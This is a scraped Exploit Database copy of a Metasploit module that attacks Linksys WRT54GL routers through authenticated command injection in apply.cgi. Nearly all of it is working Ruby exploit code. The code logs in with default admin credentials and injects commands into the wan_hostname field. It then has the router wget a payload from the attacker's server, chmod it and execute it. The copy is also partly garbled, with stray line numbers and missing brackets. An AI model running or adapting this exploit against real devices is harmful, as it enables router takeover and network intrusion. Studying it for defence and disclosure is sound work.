Linksys WRT54GL – ‘apply.cgi’ Command Execution (Metasploit)

Exploit Database
101 阅读

作者： Metasploit

日期： 2013-04-10
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/24945/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

407

408

409

410

411

412

413

414

415

416

417

418

419

420

421

422

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

# http://metasploit.com/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ManualRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer

include Msf::Exploit::EXE

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name'=> 'Linksys WRT54GL apply.cgi Command Execution',

'Description' => %q{

Some Linksys Routers are vulnerable to an authenticated OS command injection in

the Web Interface. Default credentials are admin/admin or admin/password. Since it

is a blind os command injection vulnerability, there is no output for the executed

command when using the cmd generic payload. A ping command against a controlled

system could be used for testing purposes. The user must be prudent when using this

module since it modifies the router configuration while exploitation, even when it

tries to restore previous values.

'Author'=>

[

'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module

'juan vazquez' # minor help with msf module

'License' => MSF_LICENSE,

'References'=>

[

[ 'OSVDB', '89912' ],

[ 'BID', '57459' ],

[ 'EDB', '24202' ],

[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-001' ]

'DisclosureDate' => 'Jan 18 2013',

'Privileged' => true,

'Platform' => ['linux','unix'],

'Payload'=>

{

'DisableNops' => true

'Targets'=>

[

[ 'CMD',

{

'Arch' => ARCH_CMD,

'Platform' => 'unix'

}

[ 'Linux mipsel Payload',

{

'Arch' => ARCH_MIPSLE,

'Platform' => 'linux'

}

'DefaultTarget'=> 1,

))

register_options(

[

OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),

OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),

OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),

OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),

OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),

OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ])

], self.class)

end

def get_config(config, pattern)

if config =~ /#{pattern}/

return $1

end

return ""

end

def grab_config(user,pass)

print_status("#{rhost}:#{rport} - Trying to download the original configuration")

begin

res = send_request_cgi({

'uri' => '/index.asp',

'method'=> 'GET',

'authorization' => basic_auth(user,pass)

})

if res.nil? or res.code == 404

fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")

end

if [200, 301, 302].include?(res.code)

if res.body =~ /lan_ipaddr_0/

print_good("#{rhost}:#{rport} - Successful downloaded the configuration")

else

fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible")

end

else

fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")

end

rescue ::Rex::ConnectionError

fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")

end

#now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!

@now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>")

if @now_proto_orig !~ /dhcp/

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")

end

@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")

if @wan_proto_orig !~ /dhcp/

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")

end

@lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP")

@daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>")

@lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>")

@wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>")

@need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>")

@lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\$this\,1\,223\,\"IP\"\$\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>")

@lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"IP\"\$\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">")

@lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"IP\"\$\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">")

@lan_ipaddr_3_orig = get_config(res.body, "<INPUT class=num maxLength=3\ onBlur=\"valid_range\$this,1,254,'IP'\$\;Sel_SubMask\$this.form.lan_netmask,this.form\$;\"\ size=3" <<

"\ value='(.*)'\ name=\"lan_ipaddr_3\"><\/TD>")

@router_name_orig = get_config(res.body, "name=\"router_name\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\$this\,\"Router%20Name\"\$><\/FONT><\/TD>")

@wan_domain_orig = get_config(res.body, "name=\"wan_domain\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\$this\,\"Domain%20name\"\,SPACE_NO\$><\/FONT><\/TD>")

@wan_hostname_orig = get_config(res.body, "<INPUT\ maxLength=39\ name=\"wan_hostname\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\$this\,\"Host%20Name\"\$><\/FONT><\/TD>")

@wan_mtu_orig = get_config(res.body, "<INPUT\ class=num\ maxLength=4\ onBlur=valid_mtu\$this\$\ size=5\ value='(.*)'\ name=\"wan_mtu\"><\/TD>")

if @wan_mtu_orig.to_i > 1500

@mtu_enable = "0"

end

@ui_language_orig = get_config(res.body, "<SCRIPT\ language=\"Javascript\"\ type=\"text\/javascript\" src=\"(.*)_lang_pack\/capsec.js\"><\/SCRIPT>")

@dhcp_lease_orig = get_config(res.body, "<INPUT\ maxLength=4\ onBlur=valid_range\$this\,0\,9999\,\"DHCP%20Lease%20Time\"\$\ size=4\ value=\'(.*)\'\ name=\"dhcp_lease\"\ class=num")

@dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,1\,253\,\"Number%20of%20DHCP%20users\"\$\;Sel_SubMask_onblur\$this.form.lan_netmask\,this.form\$" <<

"\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>")

@dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\$this.form.lan_netmask\,this.form\$\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ " <<

"onChange=\"valid_dhcpd_start_ip\$this.form\,\ this\$\">")

@netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>")

@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3")

@wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,223\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>")

@wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>")

@wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>")

@wan_dns0_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,254\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_3\"\ class=num\>")

@wan_dns1_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,223\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_0\"\ class=num\>")

@wan_dns1_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\' name=\"wan_dns1_1\"\ class=num\>")

@wan_dns1_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_2\"\ class=num\>")

@wan_dns1_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,254\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_3\"\ class=num\>")

@wan_dns2_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,223\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_0\"\ class=num\>")

@wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>")

@wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>")

@wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,254\,\"DNS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>")

@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3")

@wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,223\,\"WINS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>")

@wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"WINS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>")

@wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,255\,\"WINS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>")

@wan_wins_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\$this\,0\,254\,\"WINS\"\$\ size=3\ value=\'(.*)\'\ name=\"wan_wins_3\"\ class=num>")

end

def restore_conf(user,pass,uri)

# we have used most parts of the original configuration

# just need to restore wan_hostname

cmd = @wan_hostname_orig.to_s

print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration")

res = request(cmd,user,pass,uri)

if (!res)

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration")

end

#the device needs around 10 seconds to apply our current configuration

print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")

select(nil, nil, nil, @timeout)

end

def request(cmd,user,pass,uri)

begin

res = send_request_cgi({

'uri'=> uri,

'method' => 'POST',

'authorization' => basic_auth(user,pass),

'encode_params' => false,

'vars_post' => {

'submit_button' => "index",

'change_action' => "1",

'submit_type' => "1",

'action' => "Apply",

'now_proto' => @now_proto_orig.to_s,

'daylight_time' => @daylight_time_orig.to_s,

'lan_ipaddr' => @lan_ipaddr_orig.to_s,

'wait_time' => @wait_time_orig.to_s,

'need_reboot' => @need_reboot_orig.to_s,

'ui_language' => @ui_language_orig,

'wan_proto' => @wan_proto_orig.to_s,

'router_name' => @router_name_orig.to_s,

'wan_hostname' => cmd,

'wan_domain' => @wan_domain_orig.to_s,

'mtu_enable' => @mtu_enable.to_s,

'wan_mtu' => @wan_mtu_orig.to_s,

'lan_ipaddr_0' => @lan_ipaddr_0_orig.to_s,

'lan_ipaddr_1' => @lan_ipaddr_1_orig.to_s,

'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s,

'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s,

'lan_netmask' => "255.255.255.#{@netmask_orig}",

'lan_proto' => @lan_proto_orig.to_s,

'dhcp_check' => "1",

'dhcp_start' => @dhcp_start_orig.to_s,

'dhcp_num' => @dhcp_num_orig.to_s,

'dhcp_lease' => @dhcp_lease_orig.to_s,

'wan_dns' => @wan_dns_orig.to_s,

'wan_dns0_0' => @wan_dns0_0_orig.to_s,

'wan_dns0_1' => @wan_dns0_1_orig.to_s,

'wan_dns0_2' => @wan_dns0_2_orig.to_s,

'wan_dns0_3' => @wan_dns0_3_orig.to_s,

'wan_dns1_0' => @wan_dns1_0_orig.to_s,

'wan_dns1_1' => @wan_dns1_1_orig.to_s,

'wan_dns1_2' => @wan_dns1_2_orig.to_s,

'wan_dns1_3' => @wan_dns1_3_orig.to_s,

'wan_dns2_0' => @wan_dns2_0_orig.to_s,

'wan_dns2_1' => @wan_dns2_1_orig.to_s,

'wan_dns2_2' => @wan_dns2_2_orig.to_s,

'wan_dns2_3' => @wan_dns2_3_orig.to_s,

'wan_wins' => @wan_wins_orig.to_s,

'wan_wins_0' => @wan_wins_0_orig.to_s,

'wan_wins_1' => @wan_wins_1_orig.to_s,

'wan_wins_2' => @wan_wins_2_orig.to_s,

'wan_wins_3' => @wan_wins_3_orig.to_s,

'time_zone' => "-08+1+1",#default is ok

'_daylight_time' => '1'#default is ok

}

})

return res

rescue ::Rex::ConnectionError

vprint_error("#{rhost} - Failed to connect to the web server")

return nil

end

def exploit

downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))

uri = '/apply.cgi'

user = datastore['USERNAME']

pass = datastore['PASSWORD']

rhost = datastore['RHOST']

rport = datastore['RPORT']

restore = datastore['RESTORE_CONF']

@timeout = 10

# testing Login

print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")

begin

res = send_request_cgi({

'uri' => uri,

'method'=> 'GET',

'authorization' => basic_auth(user,pass)

})

if res.nil? or res.code == 404

fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")

end

if [200, 301, 302].include?(res.code)

print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")

else

fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")

end

rescue ::Rex::ConnectionError

fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")

end

grab_config(user,pass)

if target.name =~ /CMD/

if not (datastore['CMD'])

fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")

end

cmd = payload.encoded

cmd = "<code>#{cmd}</code>"

res = request(cmd,user,pass,uri)

if (!res)

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")

else

print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")

end

print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")

select(nil, nil, nil, @timeout)

restore_conf(user,pass,uri) if restore

return

end

#thx to Juan for his awesome work on the mipsel elf support

@pl = generate_payload_exe

@elf_sent = false

# start our server

resource_uri = '/' + downfile

if (datastore['DOWNHOST'])

service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri

else

#do not use SSL

if datastore['SSL']

ssl_restore = true

datastore['SSL'] = false

end

#we use SRVHOST as download IP for the coming wget command.

#SRVHOST needs a real IP address of our download host

if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")

srv_host = Rex::Socket.source_address(rhost)

else

srv_host = datastore['SRVHOST']

end

service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")

start_service({'Uri' => {

'Proc' => Proc.new { |cli, req|

on_request_uri(cli, req)

'Path' => resource_uri

}})

datastore['SSL'] = true if ssl_restore

end

# download payload

print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")

#this filename is used to store the payload on the device

filename = rand_text_alpha_lower(8)

#not working if we send all command together -> lets take three requests

cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"

cmd = "<code>#{cmd}</code>"

res = request(cmd,user,pass,uri)

if (!res)

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")

end

# wait for payload download

if (datastore['DOWNHOST'])

#waiting some time so we could be sure that the device got the payload from our third party server

print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")

select(nil, nil, nil, datastore['HTTP_DELAY'])

else

wait_linux_payload

end

register_file_for_cleanup("/tmp/#{filename}")

# chmod

cmd = "chmod 777 /tmp/#{filename}"

cmd = "<code>#{cmd}</code>"

print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")

res = request(cmd,user,pass,uri)

if (!res)

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")

end

print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")

select(nil, nil, nil, @timeout)

# execute

cmd = "/tmp/#{filename}"

cmd = "<code>#{cmd}</code>"

print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")

res = request(cmd,user,pass,uri)

if (!res)

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")

end

print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")

select(nil, nil, nil, @timeout)

#reload original configuration

if restore

restore_conf(user,pass,uri)

end

# Handle incoming requests from the server

def on_request_uri(cli, request)

#print_status("on_request_uri called: #{request.inspect}")

if (not @pl)

print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")

return

end

print_status("#{rhost}:#{rport} - Sending the payload to the server...")

@elf_sent = true

send_response(cli, @pl)

end

# wait for the data to be sent

def wait_linux_payload

print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")

waited = 0

while (not @elf_sent)

select(nil, nil, nil, 1)

waited += 1

if (waited > datastore['HTTP_DELAY'])

fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")

end